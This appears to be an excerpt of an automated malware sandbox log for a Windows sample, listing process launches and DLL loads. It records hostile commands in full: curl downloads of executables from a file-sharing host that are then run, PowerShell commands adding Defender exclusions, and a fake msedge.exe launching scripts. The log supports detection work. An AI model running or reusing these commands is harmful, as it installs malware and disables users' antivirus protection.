                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Idle.exe C:\Users\user\AppData\Local\Idle.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Idle.exe C:\Users\user\AppData\Local\Idle.exe
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Idle.exe "C:\Users\user\AppData\Local\Idle.exe"
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
                                Source: C:\Edge\msedge.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: d3d9.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: version.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wbemcomn.dllJump to behavior
